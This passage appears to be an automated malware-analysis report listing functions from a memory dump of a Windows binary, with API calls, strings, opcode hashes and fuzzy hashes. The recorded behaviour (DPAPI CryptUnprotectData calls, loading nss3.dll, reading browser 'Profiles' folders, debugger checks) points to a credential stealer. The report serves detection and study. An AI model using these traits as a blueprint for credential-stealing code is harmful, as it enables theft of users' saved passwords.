                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                          • String ID:
                                                          • API String ID: 4147378913-0
                                                          • Opcode ID: 73d67ee89eb190a49c27c9efb4d864af37e94136b524a26392e0e57a0ae5317e
                                                          • Instruction ID: 1cd673d5f8a47fd6e0c3db0782608474a3bd533a8629e41987a3a3af179ce6f2
                                                          • Opcode Fuzzy Hash: 73d67ee89eb190a49c27c9efb4d864af37e94136b524a26392e0e57a0ae5317e
                                                          • Instruction Fuzzy Hash: 3D710C71620203EAD725AF34CC86FA773A8EF64300F10852BFA05D7281EA74DD69DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D2942, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                            • Part of subcall function 002C6E7B: _free.LIBCMT ref: 002C6EDD
                                                            • Part of subcall function 002C6E7B: _free.LIBCMT ref: 002C6F13
                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 002D2A4E
                                                          • IsValidCodePage.KERNEL32(00000000), ref: 002D2A97
                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 002D2AA6
                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 002D2AEE
                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 002D2B0D
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                          • String ID:
                                                          • API String ID: 949163717-0
                                                          • Opcode ID: 0e33612c2e4d3ba696e4ee20619a1fcd151dc0f3764f17c0c170701cf150eb4e
                                                          • Instruction ID: 323c84472d3dbc244ee6e2a3b6ae21e03d5502a2aa77384e5feb07c671499dfe
                                                          • Opcode Fuzzy Hash: 0e33612c2e4d3ba696e4ee20619a1fcd151dc0f3764f17c0c170701cf150eb4e
                                                          • Instruction Fuzzy Hash: 2A517072A20206EBDB20DFA5CC45BBA73B8FF24701F14456BE914E7291E7709E58CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0028C53D, Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 618COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0028C542
                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0028C56E
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                            • Part of subcall function 00278D2D: __EH_prolog.LIBCMT ref: 00278D32
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate$FolderPath
                                                          • String ID: <$Profiles
                                                          • API String ID: 638609215-1497162080
                                                          • Opcode ID: 1da059fbc7cdf96d8d93c20ec1b9edbac4af5f53574ba2dd2d9ea87ec2171398
                                                          • Instruction ID: f77bfa79dad64b02233f9d1e2d846d68fe23c241a244e495229fd8bc5877ac4e
                                                          • Opcode Fuzzy Hash: 1da059fbc7cdf96d8d93c20ec1b9edbac4af5f53574ba2dd2d9ea87ec2171398
                                                          • Instruction Fuzzy Hash: 1F42DE30D15298CFDF25EBA8D891BDDBBB1AF55300F2081A9D4497B292DB701E89CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041C2ED, Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 618COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0041C2F2
                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041C31E
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                            • Part of subcall function 00408ADD: __EH_prolog.LIBCMT ref: 00408AE2
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate$FolderPath_strcat
                                                          • String ID: <$Profiles
                                                          • API String ID: 3344892116-1497162080
                                                          • Opcode ID: 885934d34131e6a4f50ecab40d9a05b81863a8515b810025d0e0ee2c6986a773
                                                          • Instruction ID: 2369f4f534f6bfd1b6139331569a5209e653edf967d8a66f52fd40dd1b06dfb2
                                                          • Opcode Fuzzy Hash: 885934d34131e6a4f50ecab40d9a05b81863a8515b810025d0e0ee2c6986a773
                                                          • Instruction Fuzzy Hash: 9642CC30D04258DFDF15DBA4C891BDDBBB2AF55304F1080AEE4497B292DB782E89CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00289F3B, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 604libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00289F40
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                          • SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000), ref: 0028A10D
                                                            • Part of subcall function 002A4CBB: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104,00000000), ref: 002A4D07
                                                            • Part of subcall function 00289D95: __EH_prolog.LIBCMT ref: 00289D9A
                                                          • LoadLibraryA.KERNEL32(00000000), ref: 0028A3F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$CurrentDirectoryEnvironmentLibraryLoadVariable
                                                          • String ID: \nss3.dll
                                                          • API String ID: 3355849630-2210845155
                                                          • Opcode ID: 25926ba097c57f45b5967bbda9cbfa322706dd85659e1fa60919526b34317470
                                                          • Instruction ID: 3725d895cd54652b6d62a9e032ffa670885e92bd4cfa1ae68cad34b6801b459d
                                                          • Opcode Fuzzy Hash: 25926ba097c57f45b5967bbda9cbfa322706dd85659e1fa60919526b34317470
                                                          • Instruction Fuzzy Hash: 66320230D12288CFEF05EFB8D8506EEBBB5AF59300F14442ED445A7292EB744A55CF69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002ADF22, Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindClose.KERNEL32(000000FF,?,002ADF51,?,?,?,?,00278B36), ref: 002ADF2E
                                                          • FindFirstFileExW.KERNEL32(000000FF,00000001,00278B36,00000000,00000000,00000000,?,?,?,?,?,002ADF51,?,?), ref: 002ADF5E
                                                          • GetLastError.KERNEL32(?,?,002ADF51,?,?,?,?,00278B36), ref: 002ADF6B
                                                          • FindFirstFileExW.KERNEL32(000000FF,00000000,00278B36,00000000,00000000,00000000,?,?,002ADF51,?,?,?,?,00278B36), ref: 002ADF85
                                                          • GetLastError.KERNEL32(?,?,002ADF51,?,?,?,?,00278B36), ref: 002ADF92
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Find$ErrorFileFirstLast$Close
                                                          • String ID:
                                                          • API String ID: 569926201-0
                                                          • Opcode ID: 82f7df59231a94df77c35ceef2d6901dc7cad0b730a18766c357d05bc91e43df
                                                          • Instruction ID: 63b746e5b609042b274abdf7e48d266fec6c47130b0a45d8c6ea233b2af52206
                                                          • Opcode Fuzzy Hash: 82f7df59231a94df77c35ceef2d6901dc7cad0b730a18766c357d05bc91e43df
                                                          • Instruction Fuzzy Hash: 5E015231410146BFCB301FA5DC4CCAB3F79EB97721B104629F96BC58A0DB718461DA61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004181FE, Relevance: 6.5, Strings: 5, Instructions: 273COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: incorrect data check$incorrect header check$invalid window size$need dictionary$unknown compression method
                                                          • API String ID: 0-2151277842
                                                          • Opcode ID: f83db0fc11cbd555f31d29c1fdee9e9201d13d540be144ad85982e8148594b41
                                                          • Instruction ID: 3c2a99d65a3531fd2ae7c6cf7076007d7dffbcc5d6b2605575d57f30c38ce337
                                                          • Opcode Fuzzy Hash: f83db0fc11cbd555f31d29c1fdee9e9201d13d540be144ad85982e8148594b41
                                                          • Instruction Fuzzy Hash: 1CB104B1604B01CFD374CF19D480A62B7F1EB49314B248A6ED8EACB751EB35E886CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00436208, Relevance: 6.3, APIs: 4, Instructions: 316registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0043620D
                                                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?), ref: 004362AB
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?), ref: 004362F9
                                                          • RegCloseKey.ADVAPI32(?), ref: 00436302
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CloseDeallocateH_prologOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 2130659939-0
                                                          • Opcode ID: 1d875d55f44a3a92e6f6d0d72f8ed3905e6cd03895d7432600e2d199d8172d85
                                                          • Instruction ID: 2e2a152e9acd64a1dec14cc2be301ad8bc53ee387c36928ae6c5276d6df2d3bb
                                                          • Opcode Fuzzy Hash: 1d875d55f44a3a92e6f6d0d72f8ed3905e6cd03895d7432600e2d199d8172d85
                                                          • Instruction Fuzzy Hash: C6C1487090429AEEDF11CFA4D8907FFBBB4AF15304F10556ED092B7242D7784A49CBAA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0027989F, Relevance: 5.0, APIs: 3, Instructions: 499encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002798A4
                                                          • wsprintfA.USER32 ref: 00279A9E
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00279CE8
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: CryptDataH_prologUnprotectwsprintf
                                                          • String ID:
                                                          • API String ID: 2253394434-0
                                                          • Opcode ID: ffa303130e3afc9ad330401011198afeaa221ff4c80fd99c2119a074e28a0de4
                                                          • Instruction ID: 8819b3ee68d1683e4edc23384bc64145522019717dd4cc5b004add91a7ae0f62
                                                          • Opcode Fuzzy Hash: ffa303130e3afc9ad330401011198afeaa221ff4c80fd99c2119a074e28a0de4
                                                          • Instruction Fuzzy Hash: 1C12F230D14398CBDF11EFA8D9806EEBBB5BF59300F5480A9E548B7252DB704A99CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D23F4, Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                            • Part of subcall function 002C6E7B: _free.LIBCMT ref: 002C6EDD
                                                            • Part of subcall function 002C6E7B: _free.LIBCMT ref: 002C6F13
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002D2448
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002D2492
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002D2558
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: InfoLocale$ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 3140898709-0
                                                          • Opcode ID: 38d08d35b435d4b66f3ad89a09a59c4c1270f8bd94f410a9c7cccbc91f65e61b
                                                          • Instruction ID: 7f8e5d1b6927b99b0a262875f1bd451955e4b8955bae9e1abd95d4ba7b4c736f
                                                          • Opcode Fuzzy Hash: 38d08d35b435d4b66f3ad89a09a59c4c1270f8bd94f410a9c7cccbc91f65e61b
                                                          • Instruction Fuzzy Hash: 3A619071920207DFDB299F24DC92BBA73A8EF24304F1481BAED05C6285EB74DD69CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004621A4, Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                            • Part of subcall function 00456C2B: _free.LIBCMT ref: 00456C8D
                                                            • Part of subcall function 00456C2B: _free.LIBCMT ref: 00456CC3
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004621F8
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462242
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462308
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: InfoLocale$ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 3140898709-0
                                                          • Opcode ID: a27e49c5982ed04a857646478e22fae03627ebf7288bcf2f70ac3b975ccfa41f
                                                          • Instruction ID: 8a000bafc725c4b3ca61d5f473c96e84f71ddbe037f2e9090689752218680cc7
                                                          • Opcode Fuzzy Hash: a27e49c5982ed04a857646478e22fae03627ebf7288bcf2f70ac3b975ccfa41f
                                                          • Instruction Fuzzy Hash: 6761B271500907ABDB249F25CE92BAA77A8EF04314F1044BBED05C6285FBBCD9C5CB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0028A757, Relevance: 4.6, APIs: 3, Instructions: 143encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0028A75C
                                                          • _strlen.LIBCMT ref: 0028A7C9
                                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0028A7D1
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: BinaryCryptH_prologString_strlen
                                                          • String ID:
                                                          • API String ID: 2573900957-0
                                                          • Opcode ID: 85af7550513c4f2417791dcbb9a7a73d0efdb8179ed5b3cd231f067687b4f3b3
                                                          • Instruction ID: b1fc3c6d356dbc63ef082f62fb76ab441230201f4b2ccb4c9acc72e9737eb543
                                                          • Opcode Fuzzy Hash: 85af7550513c4f2417791dcbb9a7a73d0efdb8179ed5b3cd231f067687b4f3b3
                                                          • Instruction Fuzzy Hash: 2251B1B8D1525A9FEF05DFA598905FEBBB8AF04340F14407EE409A3281DF748A16CB72
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A507, Relevance: 4.6, APIs: 3, Instructions: 143encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0041A50C
                                                          • _strlen.LIBCMT ref: 0041A579
                                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041A581
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: BinaryCryptH_prologString_strlen
                                                          • String ID:
                                                          • API String ID: 2573900957-0
                                                          • Opcode ID: 9077bb4a33619460cb7b42ab0a58d3de434fb05c3c6c2579adb977e2014510c6
                                                          • Instruction ID: 6ba59d604d5c55fd002df5b92a47d364b07147f0256ccb89d52594cc085228ac
                                                          • Opcode Fuzzy Hash: 9077bb4a33619460cb7b42ab0a58d3de434fb05c3c6c2579adb977e2014510c6
                                                          • Instruction Fuzzy Hash: 8051B1B5D05249AFDF15CFE598909FEBB78AF14304F18007FE449A3241DB388A59CB6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B62B1, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,002AE5FD), ref: 002B63A9
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002B63B3
                                                          • UnhandledExceptionFilter.KERNEL32(-00000328), ref: 002B63C0
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: daf953a23fc11f804dcb78bc101b33f70e3f225d566853822d4796fa9f962eb5
                                                          • Instruction ID: fc5b0b0ff205608b8bbfee1f96552ef9a62e0af5e8f1c0e5d24b337d7a12d374
                                                          • Opcode Fuzzy Hash: daf953a23fc11f804dcb78bc101b33f70e3f225d566853822d4796fa9f962eb5
                                                          • Instruction Fuzzy Hash: 2B31E57491122C9BCB21DF64D9887DDBBB8BF08750F5041EAE80CA7260EB749F958F45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00446061, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0043E3AD), ref: 00446159
                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00446163
                                                          • UnhandledExceptionFilter.KERNEL32(-00000328), ref: 00446170
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: daf953a23fc11f804dcb78bc101b33f70e3f225d566853822d4796fa9f962eb5
                                                          • Instruction ID: 5ee67a5c812a3d0b05b9f5f631326ed77734c8a18e7a1be4bb7e2ed2ab74c646
                                                          • Opcode Fuzzy Hash: daf953a23fc11f804dcb78bc101b33f70e3f225d566853822d4796fa9f962eb5
                                                          • Instruction Fuzzy Hash: 0631D674D0122CABDB21DF65D8887DDB7B4BF08350F5041EAE40CA7261E7749B858F49
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B688D, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,002B688C,00000000,00000000,?,00000000,?,002C0C4C), ref: 002B68AF
                                                          • TerminateProcess.KERNEL32(00000000,?,002B688C,00000000,00000000,?,00000000,?,002C0C4C), ref: 002B68B6
                                                          • ExitProcess.KERNEL32 ref: 002B68C8
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 4032922dc1dafc6eb259032e96eb5b2b76bfd45ef3b941547c49792585c2cec0
                                                          • Instruction ID: 195d6fa8a93d3e2d0b347d56416566142beb32295d3b2206eec3f0899ec7e240
                                                          • Opcode Fuzzy Hash: 4032922dc1dafc6eb259032e96eb5b2b76bfd45ef3b941547c49792585c2cec0
                                                          • Instruction Fuzzy Hash: 57E04631410549ABCB112F94DC5CAA83F69FB44381B040428F80486232DB7ADDA1CB85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0044663D, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,0044663C,00000000,00000000,?,00000000,?,004509FC), ref: 0044665F
                                                          • TerminateProcess.KERNEL32(00000000,?,0044663C,00000000,00000000,?,00000000,?,004509FC), ref: 00446666
                                                          • ExitProcess.KERNEL32 ref: 00446678
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 4032922dc1dafc6eb259032e96eb5b2b76bfd45ef3b941547c49792585c2cec0
                                                          • Instruction ID: b0032ffbb52c3285aafd74ee36578af2ae33973de04904cfd364e0057ed565d1
                                                          • Opcode Fuzzy Hash: 4032922dc1dafc6eb259032e96eb5b2b76bfd45ef3b941547c49792585c2cec0
                                                          • Instruction Fuzzy Hash: 07E046B1000588ABCB112B94EC59E293B28FB11742F02042AF84586232DB7ADC41CB4A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0027092B, Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$GetProcAddress.$l
                                                          • API String ID: 0-2784972518
                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                          • Instruction ID: b44bacbd6d9e1b3d0cdd054011d1a00371cd697c2646a9fca49fe5210108152b
                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                          • Instruction Fuzzy Hash: 72319CB2920209CFDB10CF89C880AADBBF5FF48724F14804AD505A7311C3B0EA58CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D22CE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • EnumSystemLocalesW.KERNEL32(004621A4,00000001,00000000,?,-00000050,?,002D2A22,00000000,?,?,?,00000055,?), ref: 002D2340
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                          • String ID: "*-
                                                          • API String ID: 2417226690-3996965825
                                                          • Opcode ID: 31afb89b0c91d192081553ab4253a1547b7d2b784b1f4a38f2868b4945b9d226
                                                          • Instruction ID: a956d6ddda223b9a63bb865aab6de8d911096602dd9a17ab9dd3e086985d6d6f
                                                          • Opcode Fuzzy Hash: 31afb89b0c91d192081553ab4253a1547b7d2b784b1f4a38f2868b4945b9d226
                                                          • Instruction Fuzzy Hash: BC114C376107019FDB289F38C8916BAB791FF90358B14452EE98747740D375BD52CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C8854, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,002C5E2D,?,20001004,00000000,00000002,?,?,002C5418), ref: 002C8888
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: @
                                                          • API String ID: 2299586839-1615503679
                                                          • Opcode ID: 953a4909279a59480631768fe411ddc4ee85b3370f40447c72b5729c9e4cc5fc
                                                          • Instruction ID: 7a800a8469f33125e8a42064d894075f23bc7f52521fd8e277e80ce1d5b8d8b9
                                                          • Opcode Fuzzy Hash: 953a4909279a59480631768fe411ddc4ee85b3370f40447c72b5729c9e4cc5fc
                                                          • Instruction Fuzzy Hash: BAE01A3151011CBBCB122F60EC04FAE3A66AF44751F44C229FC0566620DF718D31AA95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0027C6E8, Relevance: 3.5, APIs: 2, Instructions: 467COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0027C6ED
                                                          • wsprintfA.USER32 ref: 0027C8EA
                                                            • Part of subcall function 0027F01E: __EH_prolog.LIBCMT ref: 0027F023
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 0027CD70: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0027CD9E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$DeallocateIos_base_dtorstd::ios_base::_wsprintf
                                                          • String ID:
                                                          • API String ID: 3523824839-0
                                                          • Opcode ID: ac3b1af72a59317921a2f40ba270b28ee9ddf2da6e2d430947adc0a90685408b
                                                          • Instruction ID: e34ecd854cd668f01fbfa621014099db471a2524dc03d874287cc853f5327d39
                                                          • Opcode Fuzzy Hash: ac3b1af72a59317921a2f40ba270b28ee9ddf2da6e2d430947adc0a90685408b
                                                          • Instruction Fuzzy Hash: 2A12E130D142988BDF11EFB8DC81AEEBBB5BF55300F1081ADE44967252DB704A99CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002BA110, Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c24de35c803d14f9b29517f2d6064042a53488c5c4ea32be460deabce2a393fe
                                                          • Instruction ID: e8beeee0d3a51aab777bd1b7fba9c135b497f19081a72f219f79218194bfb9bc
                                                          • Opcode Fuzzy Hash: c24de35c803d14f9b29517f2d6064042a53488c5c4ea32be460deabce2a393fe
                                                          • Instruction Fuzzy Hash: 59F14D71E102199FDF14CFA8C8806EEB7B1FF88354F15826AD919AB341D731AE51CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00434AFC, Relevance: 3.1, APIs: 2, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: DriveH_prologLogicalStrings
                                                          • String ID:
                                                          • API String ID: 3681778021-0
                                                          • Opcode ID: d7d2371bcff36485c606e86c7ab42505d70b16fb3bbd479b5d20691bb4f19155
                                                          • Instruction ID: bdd83a0bd6f5a744ba023eb089f2e5b81b8ee10c5092899f455d4b48eb102e03
                                                          • Opcode Fuzzy Hash: d7d2371bcff36485c606e86c7ab42505d70b16fb3bbd479b5d20691bb4f19155
                                                          • Instruction Fuzzy Hash: 16315971D0125AAFDB10EFA9C4417EEFFF4AF48318F14406AE544B7381E7B85A448BA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00284420, Relevance: 2.0, APIs: 1, Instructions: 539COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00284425
                                                            • Part of subcall function 002A4CBB: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104,00000000), ref: 002A4D07
